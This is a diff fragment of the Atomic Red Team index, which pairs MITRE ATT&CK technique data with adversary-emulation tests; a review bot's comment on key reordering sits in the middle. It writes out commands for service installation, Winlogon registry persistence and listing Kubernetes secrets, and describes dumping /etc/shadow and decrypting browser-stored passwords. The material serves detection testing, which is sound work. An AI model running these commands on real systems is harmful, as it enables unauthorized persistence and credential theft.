New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: command_prompt - elevation_required: true - command: | - sc.exe create #{service_name} binPath= #{binary_path} - sc.exe start #{service_name} - cleanup_command: | - sc.exe stop #{service_name} >nul 2>&1 - sc.exe delete #{service_name} >nul 2>&1 - - name: Service Installation PowerShell - auto_generated_guid: 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 - description: | - Installs A Local Service via PowerShell. 
- Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_PowerShell - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}" - executor: - name: powershell - elevation_required: true - command: | - New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}" - Start-Service -Name "#{service_name}" - cleanup_command: | - Stop-Service -Name "#{service_name}" 2>&1 | Out-Null - try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()} - catch {} - T1547.004: - technique: - created: '2020-01-24T16:59:59.688Z' - modified: '2020-04-21T16:00:41.277Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35 - description: "Adversaries may abuse features of Winlogon to execute DLLs and/or - executables when a user logs in. Winlogon.exe is a Windows component responsible - for actions at logon/logoff as well as the secure attention sequence (SAS) - triggered by Ctrl-Alt-Delete. 
Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper - programs and functionalities that support Winlogon. (Citation: Cylance Reg - Persistence Sept 2013) \n\nMalicious modifications to these Registry keys - may cause Winlogon to load and execute malicious DLLs and/or executables. - Specifically, the following subkeys have been known to be possibly vulnerable - to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - - points to userinit.exe, the user initialization program executed when a - user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell - executed when a user logs on\n\nAdversaries may take advantage of these features - to repeatedly execute malicious code and establish persistence." - name: Winlogon Helper DLL - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1547.004 - url: https://attack.mitre.org/techniques/T1547/004 - - external_id: CAPEC-579 - source_name: capec - url: https://capec.mitre.org/data/definitions/579.html - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. 
- source_name: TechNet Autoruns - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - x_mitre_detection: |- - Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. - - Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1547.004 - atomic_tests: - - name: Winlogon Shell Key Persistence - PowerShell - auto_generated_guid: bf9f9d65-ee4d-4c3e-a843-777d04f19c38 - description: | - PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. 
- supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Shell" "explorer.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Userinit Key Persistence - PowerShell - auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb - description: | - PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. - - Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. - supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of binary to execute - type: Path - default: C:\Windows\System32\cmd.exe - executor: - command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" - "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - -' - cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows - NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - -' - name: powershell - - name: Winlogon Notify Key Logon Persistence - PowerShell - auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9 - description: | - PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - - Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff. 
- supported_platforms: - - windows - input_arguments: - binary_to_execute: - description: Path of notification package to execute - type: Path - default: C:\Windows\Temp\atomicNotificationPackage.dll - executor: - command: | - New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force - Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force - cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" - -Force -ErrorAction Ignore - -' - name: powershell credential-access: T1003.008: technique: + created: '2020-02-11T18:46:56.263Z' + modified: '2020-03-20T15:56:55.022Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern + id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4 + description: | + Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) + + The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db + name: "/etc/passwd and /etc/shadow" + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - url: https://attack.mitre.org/techniques/T1003/008 external_id: T1003.008 
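Review bot: Most of this hunk is key reordering rather than a data change, and that is what inflates the index.yaml diff: the T1003.008 block is removed with `object_marking_refs`, `created_by_ref`, `name`, `description` first and re-added with `created`, `modified`, `kill_chain_phases`, `type`, `id`, `description` first, byte-for-byte the same content otherwise. The T1505.003, T1546.003, T1543.003 and T1547.004 blocks are deleted here with no counterpart in this hunk, so a reviewer cannot tell from the hunk whether they moved or were dropped. Have the generator emit keys in a fixed order (sorted, or the order of the upstream ATT&CK STIX bundle) so regenerated diffs show only substantive edits such as the data-source renames in this patch. While these lines are still visible: the T1505.003 cleanup `del #{web_shell_path} /q` with the default `C:\inetpub\wwwroot` removes every file in the web root, not only the dropped shells, and the prereq downloads `tests.jsp` but writes it as `test.jsp`; both belong in the source atomic, not the generated index.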
@@ -18093,31 +30,19 @@ credential-access: 2020.' url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/ source_name: nixCraft - John the Ripper - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: "/etc/passwd and /etc/shadow" - description: | - Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats) - - The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) # /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db - id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-03-20T15:56:55.022Z' - created: '2020-02-11T18:46:56.263Z' + x_mitre_platforms: + - Linux + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_permissions_required: + - root x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access /etc/passwd and /etc/shadow, alerting on the pid, process name, and arguments of such programs. - x_mitre_permissions_required: - - root - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Linux + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Access' identifier: T1003.008 atomic_tests: - name: Access /etc/shadow (Local) 
@@ -18174,7 +99,7 @@ credential-access: - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + url: https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -18196,7 +121,7 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: collection - modified: '2020-10-16T15:22:11.604Z' + modified: '2021-04-21T16:41:35.256Z' created: '2020-10-15T12:05:58.755Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -18208,8 +133,8 @@ credential-access: map to a single MAC address, this could be an indicator that the ARP cache has been poisoned." x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: - Jon Sternstein, Stern Security x_mitre_platforms: @@ -18307,8 +232,7 @@ credential-access: Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)' x_mitre_data_sources: - - Windows event logs - - Authentication logs + - 'Active Directory: Active Directory Credential Request' x_mitre_contributors: - James Dunn, @jamdunnDFW, EY - Swapnil Kumbhar @@ -18357,9 +281,8 @@ credential-access: on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS 
@@ -18419,18 +342,18 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-21T16:38:27.781Z' + modified: '2021-04-14T12:04:36.243Z' created: '2017-05-31T21:31:22.767Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - Azure AD - - SaaS - - GCP - - AWS - - Azure + - Google Workspace + - Containers x_mitre_permissions_required: - User x_mitre_detection: Monitor authentication logs for system and application login @@ -18441,11 +364,15 @@ credential-access: from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. x_mitre_data_sources: - - Office 365 account logs - - Authentication logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_contributors: + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Magno Logan, @magnologan, Trend Micro + - Yossi Weizman, Azure Defender Research Team - Ed Williams, Trustwave, SpiderLabs - x_mitre_version: '2.1' + x_mitre_version: '2.2' x_mitre_is_subtechnique: false atomic_tests: [] T1003.005: @@ -18495,9 +422,7 @@ credential-access: Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. x_mitre_data_sources: - - PowerShell logs - - Process command-line parameters - - Process monitoring + - 'Command: Command Execution' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: 
@@ -18540,26 +465,109 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-15T19:39:34.817Z' + modified: '2021-03-31T19:41:06.948Z' created: '2020-02-11T18:47:46.619Z' x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Authentication logs - - AWS CloudTrail logs - - Azure activity logs - x_mitre_detection: |+ + - 'User Account: User Account Authentication' + x_mitre_detection: |- Monitor access to the Instance Metadata API and look for anomalous queries. - It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information. - - x_mitre_version: '1.1' + It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078). + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] + T1552.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1552.007 + url: https://attack.mitre.org/techniques/T1552/007 + - source_name: Docker API + url: https://docs.docker.com/engine/api/v1.41/ + description: Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved + March 31, 2021. + - source_name: Kubernetes API + url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/ + description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved + March 29, 2021. + - source_name: Unit 42 Unsecured Docker Daemons + url: https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/ + description: Chen, J.. (2020, January 29). Attacker's Tactics and Techniques + in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container API + description: "Adversaries may gather credentials via APIs within a containers + environment. APIs in these environments, such as the Docker API and Kubernetes + APIs, allow a user to remotely manage their container resources and cluster + components.(Citation: Docker API)(Citation: Kubernetes API)\n\nAn adversary + may access the Docker API to collect logs that contain credentials to cloud, + container, and various other resources in the environment.(Citation: Unit + 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such + as via a pod's service account, may also use the Kubernetes API to retrieve + credentials from the Kubernetes API server. These credentials may include + those needed for Docker API authentication or secrets from Kubernetes cluster + components. " + id: attack-pattern--f8ef3a62-3f44-40a4-abca-761ab235c436 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-12T18:20:31.636Z' + created: '2021-03-31T14:01:52.321Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: |- + Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs. + + It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078). 
+ x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Jay Chen, Palo Alto Networks + - Yossi Weizman, Azure Defender Research Team + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Access' + - 'User Account: User Account Authentication' + identifier: T1552.007 + atomic_tests: + - name: ListSecrets + auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a + description: 'A Kubernetes secret is an object that lets users store and manage + sensitive information, such as passwords and connection strings in the cluster. + Secrets can be consumed by reference in the pod configuration. Attackers who + have permissions to retrieve the secrets from the API server (by using the + pod service account, for example) can access sensitive information that might + include credentials to various services. + +' + supported_platforms: + - macos + - linux + input_arguments: + namespace: + description: K8s namespace to list + type: String + default: default + executor: + prereq_command: 'which kubectl + +' + command: 'kubectl get secrets -n #{namespace} + +' + name: bash + elevation_required: false T1056.004: technique: external_references: @@ -18577,7 +585,7 @@ credential-access: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.' 
@@ -18627,9 +635,9 @@ credential-access: description: | Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: - * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) - * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) - * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017) + * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 
2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6 type: attack-pattern kill_chain_phases: @@ -18637,15 +645,11 @@ credential-access: phase_name: collection - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T21:29:13.565Z' + modified: '2020-11-10T18:29:31.138Z' created: '2020-02-11T19:01:15.930Z' x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Metadata' x_mitre_permissions_required: - Administrator - SYSTEM @@ -18737,20 +741,20 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-19T22:43:45.475Z' + modified: '2021-04-06T12:31:06.695Z' created: '2020-02-11T18:39:59.959Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt 
@@ -18758,27 +762,21 @@ credential-access: x_mitre_permissions_required: - User x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_contributors: - Diogo Fernandes - Anastasios Pingios atomic_tests: [] T1552.001: technique: - created: '2020-02-04T12:52:13.006Z' - modified: '2020-03-25T18:30:10.630Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc description: |- Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) - In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. 
(Citation: Specter Ops - Cloud Credential Storage) + In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage) name: Credentials In Files created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: 
@@ -18798,22 +796,39 @@ credential-access: description: 'Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.' source_name: SRD GPP + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. Retrieved April 5, 2021.' + - source_name: Unit 42 Unsecured Docker Daemons + url: https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/ + description: Chen, J.. (2020, January 29). Attacker's Tactics and Techniques + in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021. - source_name: Specter Ops - Cloud Credential Storage url: https://posts.specterops.io/head-in-the-clouds-bd038bb69e48 description: Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-12T18:32:32.803Z' + created: '2020-02-04T12:52:13.006Z' x_mitre_platforms: + - Windows + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure + - Containers x_mitre_contributors: + - Rory McCune, Aqua Security + - Jay Chen, Palo Alto Networks + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee - Microsoft Threat Intelligence Center (MSTIC) x_mitre_data_sources: - - Process command-line parameters - - File monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: 'While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line 
@@ -18828,7 +843,7 @@ credential-access: x_mitre_system_requirements: - Access to files x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1552.001 atomic_tests: - name: Extract Browser and System credentials with LaZagne @@ -18888,12 +903,6 @@ credential-access: elevation_required: true T1555: technique: - created: '2020-02-11T18:48:28.456Z' - modified: '2020-03-25T18:40:15.564Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0 description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, @@ -18909,6 +918,12 @@ credential-access: - source_name: mitre-attack external_id: T1555 url: https://attack.mitre.org/techniques/T1555 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-29T21:00:19.428Z' + created: '2020-02-11T18:48:28.456Z' x_mitre_platforms: - Linux - macOS @@ -18923,11 +938,11 @@ credential-access: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - PowerShell logs - - API monitoring - - File monitoring - - Process monitoring - - System calls + - 'Process: Process Creation' + - 'File: File Access' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Process: Process Access' identifier: T1555 atomic_tests: - name: Extract Windows Credential Manager via VBA 
@@ -18965,39 +980,11 @@ credential-access: T1555.003: technique: created: '2020-02-12T18:57:36.041Z' - modified: '2020-02-17T13:20:02.386Z' + modified: '2021-04-14T14:03:47.293Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access type: attack-pattern - id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8 - description: "Adversaries may acquire credentials from web browsers by reading - files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. Web browsers - typically store the credentials in an encrypted format within a credential - store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor - example, on Windows systems, encrypted credentials may be obtained from Google - Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User - Data\\Default\\Login Data and executing a SQL query: SELECT action_url, - username_value, password_value FROM logins;. The plaintext password - can then be obtained by passing the encrypted credentials to the Windows API - function CryptUnprotectData, which uses the victim’s cached logon - credentials as the decryption key. (Citation: Microsoft CryptUnprotectData - ‎April 2018)\n \nAdversaries have executed similar procedures for common web - browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential - Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries - may also acquire credentials by searching web browser process memory for patterns - that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter - acquiring credentials from web browsers, adversaries may attempt to recycle - the credentials across different systems and/or accounts in order to expand - access. 
This can result in significantly furthering an adversary's objective - in cases where credentials gained from web browsers overlap with privileged - accounts (e.g. domain administrator)." - name: Credentials from Web Browsers - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1555.003 @@ -19006,7 +993,7 @@ credential-access: url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. - - source_name: Microsoft CryptUnprotectData ‎April 2018 + - source_name: Microsoft CryptUnprotectData April 2018 url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019. 
@@ -19023,12 +1010,48 @@ credential-access: url: https://github.com/putterpanda/mimikittenz description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019. - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Credentials from Web Browsers + description: "Adversaries may acquire credentials from web browsers by reading + files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) + Web browsers commonly save credentials such as website usernames and passwords + so that they do not need to be entered manually in the future. Web browsers + typically store the credentials in an encrypted format within a credential + store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor + example, on Windows systems, encrypted credentials may be obtained from Google + Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User + Data\\Default\\Login Data and executing a SQL query: SELECT action_url, + username_value, password_value FROM logins;. The plaintext password + can then be obtained by passing the encrypted credentials to the Windows API + function CryptUnprotectData, which uses the victim’s cached logon + credentials as the decryption key. 
(Citation: Microsoft CryptUnprotectData + April 2018)\n \nAdversaries have executed similar procedures for common web + browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential + Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores + Internet Explorer and Microsoft Edge credentials in Credential Lockers managed + by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).\n\nAdversaries + may also acquire credentials by searching web browser process memory for patterns + that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter + acquiring credentials from web browsers, adversaries may attempt to recycle + the credentials across different systems and/or accounts in order to expand + access. This can result in significantly furthering an adversary's objective + in cases where credentials gained from web browsers overlap with privileged + accounts (e.g. domain administrator)." + id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8 + x_mitre_data_sources: + - 'File: File Access' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_contributors: + - Ryan Benson, Exabeam + - Barry Shteiman, 